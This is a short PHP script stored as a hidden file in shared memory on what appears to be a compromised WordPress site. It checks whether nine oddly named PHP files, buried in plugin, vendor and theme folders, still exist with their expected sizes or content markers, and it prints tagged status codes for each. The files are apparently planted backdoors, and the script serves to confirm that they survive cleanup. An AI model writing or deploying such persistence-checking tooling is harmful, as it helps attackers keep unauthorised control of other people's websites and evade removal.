File: //proc/thread-self/root/dev/shm/.binding
<?php $r = '/home/purpoqxe/public_html'; $x = ["/wp-includes/widgets/class-wp-widget-media.php"=>"bd@@70819574@@58",
"/wp-content/plugins/plugnmeet/admin/on.footer.php"=>"bd@@66683920@@1020",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-crt-php/src/AWS/CRT/Internal/OutputFilter.php"=>"bd@@66321428@@537",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/support-app/2021-08-20/endpoint.1.set.php"=>"bd@@66321439@@535",
"/wp-content/plugins/the-events-calendar/common/src/Common/Event_Automator/Power_Automate/REST/V1/Documentation/Swagger.Documentation.php"=>"bd@@66609739@@2286",
"/wp-content/themes/lineup-wpcom/includest.php"=>"bd@@66683923@@675",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/S3/RegionalEndpoint/Exception/formselectgroup.php"=>"bd@@66321433@@598",
"/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/chime-sdk-messaging/2021-05-15/endpoint.2.set.php"=>"bd@@66321441@@1733",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Contracts/Client.V3.php"=>"ui@@197254@@68"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');